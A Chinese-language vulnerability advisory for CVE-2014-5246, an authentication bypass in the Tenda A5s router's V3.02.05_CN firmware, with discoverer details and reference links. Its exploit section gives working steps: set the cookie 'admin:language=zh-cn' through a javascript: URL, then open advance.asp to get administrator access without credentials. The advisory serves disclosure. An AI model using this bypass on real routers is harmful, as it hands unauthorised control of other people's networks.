CVE中文申请站

一、漏洞摘要

漏洞名称: 腾达A5s无线路由器认证绕过漏洞
上报日期: 2014-08-18
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.tenda.com.cn/
软件链接: http://www.tenda.com.cn/download/detail-1082.html
版本: V3.02.05_CN
CVE编号: CVE-2014-5246


二、漏洞概述

腾达A5s是深圳市吉祥腾达科技有限公司的一款无线路由器产品(http://www.tenda.com.cn/search/a5s.html),该产品V3.02.05_CN固件中存在认证绕过漏洞,可通过修好cookie信息绕过管理员账号及密码登录路由器后台管理页面进行操作。


三、利用代码

打开无线路由器管理地址。

http://192.168.2.1/

通过javascript脚本设置cookies值。

javascript:document.cookie='admin:language=zh-cn'

打开无线路由器设置页面,即可直接访问并进行管理员操作。

http://192.168.2.1/advance.asp


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/16/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5246
exploit-db:https://www.exploit-db.com/exploits/34361/
MISC:http://packetstormsecurity.com/files/127905/Tenda-A5s-Router-Authentication-Bypass.html
BID:http://www.securityfocus.com/bid/69267
OSVDB:http://osvdb.org/show/osvdb/110146
XF:https://exchange.xforce.ibmcloud.com/vulnerabilities/95337

标签: none